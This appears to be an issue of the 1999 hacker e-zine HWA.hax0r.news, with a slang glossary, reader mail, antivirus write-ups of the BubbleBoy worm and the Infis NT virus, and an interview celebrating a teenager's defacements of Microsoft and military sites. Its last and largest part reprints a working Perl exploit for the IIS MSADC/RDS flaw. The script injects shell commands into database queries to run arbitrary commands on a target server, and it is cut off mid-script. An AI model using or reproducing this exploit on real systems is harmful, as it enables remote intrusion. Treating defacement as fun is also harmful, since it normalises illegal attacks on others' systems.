~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sla5h.............................: Croatia N0Portz ..........................: Australia system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland Wyze1.............................: South Africa Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) Sla5h's email: smuddo@yahoo.com ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck, where the fuck, when the fuck etc .. *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik gov-boi _Jeezus_ Haze_ YTcracker Folks from #hwa.hax0r,news and #fawkerz, #ninjachat and #sesame Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick kewl sites: + http://www.hack.co.za NEW + http://blacksun.box.sk. NEW + http://packetstorm.securify.com/ NEW + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, lets give the message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org domain comes back online (soon) meanwhile the beseen board is still up... ============================================================================== Our newsletter gets mirrored and indexed by new underground search engine Nethersearch.com From: signalGod To: hwa@press.usmc.net Sent: Thursday, November 18, 1999 10:00 AM Subject: NetherSearch.Com HWA, I am one of the webmasters of NetherSearch.Com. We subscribed to your newsletter and have decided to download all of your newsletters to our server to act as a mirror for your files. Please feel free to visit our site and check it out, and please let us know what your think. Your newsletters have been added to our database, and is searchable with our database search engine. We would also like to invite you to submit your website to our internet search database. This will help us both by driving some traffic to your site and adding depth to our database. Thanks, ______________________________________________________ SignalGod NetherSearch.Com - http://www.nethersearch.com - - Underground and Hacking Database Search Engine - Submit a URL to NetherSearch.Com - http://www.nethersearch.com/search/addurl.htm - -=- From: Drew aka. Wyzewun To: Sent: Friday, November 19, 1999 1:36 PM Subject: el8 phan mail!@#$% *Ahem* Dear HWA.hax0r.news, Since I have never seen anything in your mailbag, I figured I would write to you and give you something to put there. First off, let me dispell the rumour that Cruciphux has sex with sheep. Second of all, let me dispell the rumour that there never *was* a rumour that Cruciphux has sex with sheep. And in conclusion, I would like to say that I personally enjoy having sex with sheep. Your zine is the best in the whole wide world, except for that Forbidden Knowledge zine, which is even more kickass. Now who does that again... fux0r, I can't remember. But this is under no circumstances because I am drunk. Or because Pneuma has mad cheap wine here. It is just because I simply DON'T KNOW, okay?!@#$ Please respond to me as soon as possible and give me a URL for good 1nph0z3 on insecurities in Vortexia's anal cavity - they told me to look for RFC31337, but I can't find it anywhere! Please help... That Neato Elito Skanky Ass Hoe, Wyzewun [w1@antioffline.com] _______________________________________________________________ http://www.webmail.co.za the South-African free email service -=- From: Kernel Panic To: HWA.hax0r.news Sent: Tuesday, November 16, 1999 5:08 AM Subject: RE: Issue #41 for Nov 7th out today ================================================================== The following message was received at HWA.hax0r.news-owner@listbot.com and is being forwarded to you, the list owner. ================================================================== I just want to say "Thank U for the great job of resuming the events and news of security bussiness" Keep up with the excellent job Kernel Panic SouthAmerica-Peru ______________________________________________________________________ To unsubscribe, write to HWA.hax0r.news-unsubscribe@listbot.com Start Your Own FREE Email List at http://www.listbot.com/ From: To: Sent: Friday, November 19, 1999 9:06 PM Subject: xxhax0rxx claims responsiblity for hacking & destroying website Do you know this xxhax0rxx person? He has claimed responsibility for hacking & destroying a school webpage....he also posted in its place a full page of written garbage about our school. Please tell me that he is not affiliated with your group. I can send all correspondence from him to you if you would like. But he claims that he is Hax0r and goes by the screen name of xxhax0rxx. -=- Seems that because we have 'hax0r' in our name that we're target for all kinds of lamers that use an alias or connotation of 'hax0r', notice the 'screenname' good old aol... - Ed See? we really do get mail Wyze1 ;-) I just don't print it all, ok sometimes I forget, sometimes its lame ... but kudos are always welcomed... - Ed 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* * We're a week behind schedule with this release again, * seems like i'm not doing well in cold season. Being ill * sucks and doesn't lend itself towards working on the * newsletter. Anyway here it is, have fun.. check out all * the new website defacements by sSh (Sesame Street Hackers) * they've been busy ppl... * * */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. -= start =--= start =--= start =--= start =--= start =--= start =--= start =- ____ _ _ / ___|___ _ __ | |_ ___ _ __ | |_ | | / _ \| '_ \| __/ _ \ '_ \| __| | |__| (_) | | | | || __/ | | | |_ \____\___/|_| |_|\__\___|_| |_|\__| _ _ ___| |_ __ _ _ __| |_ / __| __/ _` | '__| __| \__ \ || (_| | | | |_ |___/\__\__,_|_| \__| -= start =--= start =--= start =--= start =--= start =--= start =--= start =- 03.0 Bubbleboy email worm description ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.avp.ch I-Worm.BubbleBoy Type: Email Worm Platform: MS Windows with Internet Explorer 5.0, MS Outlook 98/2000 or MS Outlook Express This is a worm virus spreading via Internet as infected email messages. The worm arrives as a message with no attachments - the worm uses several tricks to activate its code directly from the message body. When this message is opened, the worm code takes control, gets access to system resources (disk files and system registry), processes Outlook address book and sends infected messages to these addresses (in a similar way the Macro.Word97.Melissa"virus does). This is the first known modern Internet worm that spreads its copies with no attached data. In case of other Internet worms a user should open the attach to activate the worm routines. In case of this worm its spreading routines take control at the moment the message itself is opened. The Tricks To spread its copies this worm uses two tricks. The first one is the feature of MS Outlook that allows creating messages in the HTML format. HTML messages may contain scripts that will be automatically executed at the moment the HTML message is being displayed (user opens the message). The worm uses this feature to run its code when the infected message is opened. To spread its copies further and to bypass Internet Explorer security the worm uses another trick, the so-called "Scriptlet.Typelib" security vulnerability. This security breach allows HTML scripts to create disk files. The worm uses this breach to create a HTA-file (HTML Applications, new type appeared with IE5) which contains the main worm code. This file is created in the Startup Windows folder, and as a result it is activated on next Windows startup. Being run as a local disk file the worm script in this HTML gets access to disk files and resources with no Internet Explorer security warning messages, connects Outlook address book and spreads itself. Technical details When a user opens infected message the worm script embedded into this message body is automatically activated and executed by MS Outlook. This script (by using security breach) creates the "UPDATE.HTA" file in the "C:\WINDOWS\START MENU\PROGRAMS\STARTUP" directory. The same file the worm tries to create in the "C:\WINDOWS\MENU INICIO\PROGRAMAS\INICIO\" directory (Spain Windows default name). This "UPDATE.HTA" file contains the main worm code. It will be executed on next Windows startup because of its location in the Startup folder. The worm has a minor bug here: it supposes that Windows is always installed in the C:\WINDOWS directory, in other case the worm cannot create its file and fails to replicate further. When the UPDATE.HTA file is executed, the worm runs Outlook application in hidden window and creates a new message to all recipients from Outlook address book in the same way as "Melissa" virus does. This new message has the HTML format and contains worms script in the body. Message subject is "BubbleBoy back!", and text body is looks like follows: The BubbleBoy incident, pictures and sounds http://www.towns.com/dorms/tom/bblboy.htm (Note: the above shown web-address doesn't work) After this message is being sent, to prevent duplicate messages sending the worm creates in system registry key: "HKEY_LOCAL_MACHINE\Software\OUTLOOK.BubbleBoy\" = "OUTLOOK.BubbleBoy 1.0 by Zulu" At the end the worm leaves on the screen the window with the text inside: System error, delete "UPDATE.HTA" from the startup folder to solve this problem. The worm also changes the Windows registration data (this routine is executed at the moment the UPDATE.HTA script takes control): RegisteredOwner = "BubbleBoy" RegisteredOrganization = "Vandelay Industries" Protection Microsoft has released an update that eliminates this security vulnerability. We strongly recommend you visit http://support.microsoft.com/support/kb/articles/Q240/3/08.ASP and install this update. If you do not use any HTML applications (HTA-files) at your work, there is another way to prevent infection by viruses of this type (the worms and viruses that use "Scriptlet.Typelib" security vulnerability). It requires to remove the file association for .HTA extension. To do this you have to follow several steps: 1.Double click the MyComputer icon on desktop. 2.In the appearing window choose menu the "View" -> "Options...". 3.On "File Types" tab in "Registered file types" listbox select "HTML Applicaton" item. 4.Click "Remove" button and confirm action. 5.Close options dialog box. @HWA 04.0 WinNT.Infis.4608 new Win NT virus ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.avp.ch/ WinNT.Infis.4608 "Infis" is a memory resident virus operating under Windows NT 4.0 with Service Packs 2, 3, 4, 5, 6 installed. It does not affect systems running Windows 95/98, Windows 2000 or other versions of Windows NT. Indication of an infection The virus does not manifest itself in any way and does not do any harm to the system. Despite this the virus has a bug in its infection routine and corrupts some files while infecting them, the corrupted files when run cause the standard "is not a valid Windows NT application" error message. Another indicator of virus presence is the INF.SYS file in the /WinNT/System32/Drivers folder. Installation The virus installation routine copies the virus to the system, registers itself in there and returns control to the host program. As a result on first start the virus just installs its "dropper" to the system and does not infect the WinNT memory and other files. The memory and file infection routines will be activated later, when the "dropper" is run. To install its "dropper" the virus extracts its "pure" code (4608 bytes) as a standalone PE EXE file with the INF.SYS name and writes it to the \SystemRoot\system32\drivers directory. Next the virus adds "run-it" commands to the system registry, to do that the virus creates new Registry key with three sections:: \Registry\Machine\System\CurrentControlSet\Services\inf Type = 1 - standard Windows NT driver Start = 2 - driver start mode ErrorControl = 1 - continue system loading on error in driver As a result the virus dropper is loaded as system WinNT driver on next system restart. When the INF.SYS virus dropper takes control the virus allocates a block of WinNT memory, reads its complete copy from the INF.SYS file for further use in infection routine and hooks a poorly documented WinNT internal system functions handler. The virus hooker intercepts file opening function only, checks the file name and extension, then opens the file, checks file format (PE) and runs the infection routine. Infection The "Infis" virus infects only PE (Portable Executable) EXE-files except CMD.EXE (Windows NT command processor). To separate infected and not infected files the virus sets file time and date double word stamp in the PE header to -1 (FFFFFFFFh). While infecting a file the virus increases the size of last file section, writes itself to there and modifies necessary fields in the file header. As a result when infected PE files are executed, the virus code receives control and runs the installation routine. Payload The "Infis" virus does not carry any destructive payload. However, it contains errors that corrupt some files when infecting them. When the corrupted file is run it invokes a standard Windows NT application error message. 05.0 OSALL Interview with Flipz 1st person to deface a Microsoft site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interview With Flipz 10/27/99 Mike Hudack Editor-in-Chief Flipz is a young man who both goes to school and moonlights as a systems analyst somewhere. He´s got a bright future for someone only fifteen years old [Editor´s NOTE: As the writer of this article, I must admit that I am but sixteen years old.]... And, at that young age, he has been covered in MSNBC, Ziff Davis, Slashdot and so many more. At that young age he´s made history as the first person to deface a Microsoft Web page -- ever. "I do it for fun, just like everyone does it for fun," Flipz said in an effect to explain why he defaces sites, "we don´t do it because we have to, we don´t do it because we want to, we don´t do it because it´s fun." He says that his first defacement was when he was around ten or eleven -- that time a Solaris machine. He cnows that he hacs but doesn´t now that he´s defaced servers? Andersen Air Force Base "Hold on five seconds, I´ll tell you," he told me when I asked if anything else was happening soon. After a couple affirmatives and a few obscenities he informed me that he´d just gotten his latest defacement. "Andersen.af.mil," he calmly told me. It was just the latest in a string of sites he had previously held root on. Apparently something has happened in Flipz´ life to make him want to just throw it all out. "It´s been tough," he said. "I just wanted to have some fun," let out some pent-up aggression. Microsoft Now it seems that he targets Microsoft NT boxes exclusively, explaining that he hates Windows NT -- and that Windows 2000 pisses him off even more. The thing that Flipz is most famous for right now is defacing the first Microsoft site ever. He was on the phone with someone when he defaced it... When he heard it was the first he was excited, but not suprised. "I kind of knew it, but I didn´t know it," he says about the defacement. High Profile Like the Microsoft defacement, all of Flipz´ attacks have been attention garnering, although none so much as that. He´s attacked numerous military sites, including from the Navy and Army. In addition he´s defaced two Department of Energy Web sites and the Duracell Battery Company, among others. Law Enforcement It was a couple months ago when Flipz defaced People´s Bank, a relatively small Connecticut bank. Somewhat aftewards Attrition.org was subpeonaed for any records they may have pertaining to Flipz and the defacement. When I told him about the subpeona Flipz was rather shocked that the FBI hadn´t raided him yet. "It´s been a while... you´d think they would have at least stopped me after White Sands [Missile Base.]" The FBI didn´t though. At one point during our conversation Flipz thought he was being raided as a black van rounded the corner to his house. It turned out to be nothing, however. "I´m just sitting on edge, waiting for them to raid me," he said. He explained that he hadn´t done much to cover his tracks because they´d find him anyway. "Why bother with twenty hops when they´ll just issue twenty subpeonas?" And, he added, "even if I cover my tracks well... all they need is one person on IRC to say `oh, I know who this person is.´" The FBI, at this point, doesn´t seem to know Flipz´ identity. They asked me several times in a later interview, and each time came up empty because I didn´t know myself. More is available on the FBI. Skills Some people on IRC have questioned Flipz´ skills. Flipz says that he "works with NT on a daily basis [as a] systems analyst" but others aren´t too sure. "He´s demonstrated no real NT skills," said one IRCer who knew flipz but wished to remain anonymous. This IRCer said that all the defacements were on NT systems running IIS, insinuating that Flipz was simply using the eEye exploit released earlier this year. But Flipz mantains that "I´m not using IIS, I´m not using FrontPage, I´m not using FTP exploits..." Rather, he says he´s using "some exploits modified for my own use and a private one or two." More detail on his methodology, or speculation thereof, is available. Related links: http://www.aviary-mag.com/News/FBI/fbi.html http://www.aviary-mag.com/News/Old_News/IIS___eEye/iis___eeye.html http://www.aviary-mag.com/News/The_Exploit/the_exploit.html Flipz' Exploit? (Previously released) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ######################################################################## #!/usr/bin/perl # # MSADC/RDS 'usage' (aka exploit) script version 2 # # by rain forest puppy # # - added UNC support, really didn't clean up code, but oh well use Socket; use Getopt::Std; getopts("e:vd:h:XRVNwcu:s:", \%args); print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --\n"; if (!defined $args{h} && !defined $args{R}) { print qq~ Usage: msadc.pl -h { -d -X -v } -h = host you want to scan (ip or domain) -d = delay between calls, default 1 second -X = dump Index Server path table, if available -N = query VbBusObj for NetBIOS name -V = use VbBusObj instead of ActiveDataFactory -v = verbose -e = external dictionary file for step 5 -u <\\\\host\\share\\file> = use UNC file -w = Windows 95 instead of Windows NT -c = v1 compatibility (three step query) -s = run only step Or a -R will resume a (v2) command session ~; exit;} ########################################################### # config data @drives=("c","d","e","f","g","h"); @sysdirs=("winnt","winnt35","winnt351","win","windows"); # we want 'wicca' first, because if step 2 made the DSN, it's ready to go @dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications", "cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM", "banner", "banners", "ads", "ADCDemo", "ADCTest"); # this is sparse, because I don't know of many @sysmdbs=( "\\catroot\\icatalog.mdb", "\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb", "\\system32\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb", "\\system32\\certmdb.mdb", "\\system32\\ias\\ias.mdb", "\\system32\\ias\dnary.mdb", "\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot% @mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb", "\\cfusion\\cfapps\\forums\\forums_.mdb", "\\cfusion\\cfapps\\forums\\data\\forums.mdb", "\\cfusion\\cfapps\\security\\realm_.mdb", "\\cfusion\\cfapps\\security\\data\\realm.mdb", "\\cfusion\\database\\cfexamples.mdb", "\\cfusion\\database\\cfsnippets.mdb", "\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb", "\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb", "\\cfusion\\brighttiger\\database\\cleam.mdb", "\\cfusion\\database\\smpolicy.mdb", "\\cfusion\\database\cypress.mdb", "\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb", "\\website\\cgi-win\\dbsample.mdb", "\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb", "\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb" ); #these are just \ ########################################################### $ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target=""; if (defined $args{v}) { $verbose=1; } else {$verbose=0;} if (defined $args{d}) { $delay=$args{d};} else {$delay=1;} if(!defined $args{R}){ $target= inet_aton($ip) || die("inet_aton problems; host doesn't exist?");} if (!defined $args{R}){ $ret = &has_msadc; } if (defined $args{X}) { &hork_idx; exit; } if (defined $args{N}) { &get_name; exit; } if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";} if (defined $args{R}) { &load; exit; } print "Type the command line you want to run ($comm assumed):\n" . "$comm "; $in=; chomp $in; $command="$comm " . $in ; if (!defined $args{s} || $args{s}==1){ print "\nStep 1: Trying raw driver to btcustmr.mdb\n"; &try_btcustmr;} if (!defined $args{s} || $args{s}==2){ print "\nStep 2: Trying to make our own DSN..."; if (&make_dsn){ print "<>\n"; sleep(3); } else { print "<>\n"; }} # we need to sleep to let the server catchup if (!defined $args{s} || $args{s}==3){ print "\nStep 3: Trying known DSNs..."; &known_dsn;} #crippled if (!defined $args{s} || $args{s}==5){ if (defined $args{u}){ print "\xStep 5: Trying UNC..."; &use_unc; } else { "\nNo -u; Step 5 skipped.\n"; }} if (!defined $args{s} || $args{s}==6){ if (defined $args{e}){ print "\nStep 6: Trying dictionary of DSN names..."; &dsn_dict; } else { "\nNo -e; Step 6 skipped.\n"; }} print "\n\nNo luck, guess you'll have to use a real hack, eh?\n"; exit; ############################################################################## sub sendraw { # this saves the whole transaction anyway my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ open(OUT,">raw.out"); my @in; select(S); $|=1; print $pstr; while(){ print OUT $_; push @in, $_; print STDOUT "." if(defined $args{X});} close(OUT); select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); }} ############################################################################## sub make_header { # make the HTTP request my $aa, $bb; if (defined $args{V}){ $aa="VbBusObj.VbBusObjCls.GetRecordset"; $bb="2"; } else { $aa="AdvancedDataFactory.Query"; $bb="3";} #crippled ADCClientVersion:01.06 Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=$bb --!ADM!ROX!YOUR!WORLD! Content-Type: application/x-varg Content-Length: $reqlen EOT ; $msadc=~s/\n/\r\n/g; return $msadc;} ############################################################################## sub make_req { # make the RDS request my ($switch, $p1, $p2)=@_; my $req=""; my $t1, $t2, $query, $dsn; if ($switch==1){ # this is the btcustmr.mdb query $query="Select * from Customers where City='|shell(\"$command\")|'"; $dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" . $p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";} elsif ($switch==2){ # this is general make table query $query="create table AZZ (B int, C varchar(10))"; $dsn="$p1";} elsif ($switch==3){ # this is general exploit table query $query="select * from AZZ where C='|shell(\"$command\")|'"; $dsn="$p1";} elsif ($switch==4){ # attempt to hork file info from index server $query="select path from scope()"; $dsn="Provider=MSIDXS;";} elsif ($switch==5){ # bad query $query="select"; $dsn="$p1";} elsif ($switch==6){ # this is table-independant query (new) $query="select * from MSysModules where name='|shell(\"$command\")|'"; $dsn="$p1";} $t1= make_unicode($query); $t2= make_unicode($dsn); if(defined $args{V}) { $req=""; } else {$req = "\x02\x00\x03\x00"; } $req.= "\x08\x00" . pack ("S1", length($t1)); $req.= "\x00\x00" . $t1 ; $req.= "\x08\x00" . pack ("S1", length($t2)); $req.= "\x00\x00" . $t2 ; $req.="\r\n--!ADM!ROX!YOUR!WORLD!--\r\n"; return $req;} ############################################################################## sub make_unicode { # quick little function to convert to unicode my ($in)=@_; my $out; for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; } return $out;} ############################################################################## sub rdo_success { # checks for RDO return success (this is kludge) my (@in) = @_; my $base=content_start(@in); if($in[$base]=~/multipart\/mixed/){ return 1 if( $in[$base+10]=~/^\x09\x00/ );} return 0;} ############################################################################## sub make_dsn { # this (tries to) make a DSN for us print "\nMaking DSN: "; foreach $drive (@drives) { print "$drive: "; my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" . "Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq=" . $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n"); $results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#; return 0 if $2 eq "404"; # not found/doesn't exist if($2 eq "200") { foreach $line (@results) { return 1 if $line=~/

Datasource creation successful<\/H2>/;}} } return 0;} ############################################################################## sub verify_exists { my ($page)=@_; my @results=sendraw("GET $page HTTP/1.0\n\n"); return $results[0];} ############################################################################## sub try_btcustmr { foreach $dir (@sysdirs) { print "$dir -> "; # fun status so you can see progress foreach $drive (@drives) { print "$drive: "; # ditto $reqlen=length( make_req(1,$drive,$dir) ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(1,$drive,$dir)); if (rdo_success(@results)){print "Success!\n"; save("dbq=".$drive.":\\".$dir."\\help\\iis\\htm\\tutorial\\btcustmr.mdb;"); exit;} else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}} ############################################################################## sub odbc_error { my (@in)=@_; my $base; my $base = content_start(@in); if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this $in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; $in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; $in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; return $in[$base+4].$in[$base+5].$in[$base+6];} print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n"; print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] . $in[$base+4] . $in[$base+5] . $in[$base+6]; exit;} ############################################################################## sub verbose { my ($in)=@_; return if !$verbose; print STDOUT "\n$in\n";} ############################################################################## sub save { my ($p1)=@_; my $ropt=""; open(OUT, ">rds.save") || print "Problem saving parameters...\n"; if (defined $args{c}){ $ropt="c ";} if (defined $args{V}){ $ropt.="V ";} if (defined $args{w}){ $ropt.="w ";} print OUT "v2\n$ip\n$ropt\n$p1\n"; close OUT;} ############################################################################## sub load { my ($action)=@_; my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)};"; open(IN,"; close(IN); die("Wrong rds.save version") if $p[0] ne "v2\n"; $ip="$p[1]"; $ip=~s/\n//g; $target= inet_aton($ip) || die("inet_aton problems"); print "Resuming to $ip ..."; @switches=split(/ /,$p[2]); foreach $switch (@switches) { $args{$switch}="1";} if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";} print "Type the command line you want to run ($comm assumed):\n" . "$comm "; $in=; chomp $in; $command="$comm " . $in ; $torun="$p[3]"; $torun=~s/\n//g; if($torun=~/btcustmr/){ $args{'c'}="1";} # this is a kludge to make it work if($torun=~/^dbq/){ $torun=$drvst.$torun; } if(run_query("$torun")){ print "Success!\n";} else { print "failed\n"; } exit;} ############################################################################## sub create_table { return 1 if (!defined $args{c}); return 1 if (defined $args{V}); my ($in)=@_; $reqlen=length( make_req(2,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(2,$in,"")); return 1 if rdo_success(@results); my $temp= odbc_error(@results); verbose($temp); return 1 if $temp=~/Table 'AZZ' already exists/; return 0;} ############################################################################## sub known_dsn { foreach $dSn (@dsns) { print "."; next if (!is_access("DSN=$dSn")); if(create_table("DSN=$dSn")){ if(run_query("DSN=$dSn")){ print "$dSn: Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n";} ############################################################################## sub is_access { my ($in)=@_; return 1 if (!defined $args{c}); return 1 if (defined $args{V}); $reqlen=length( make_req(5,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my 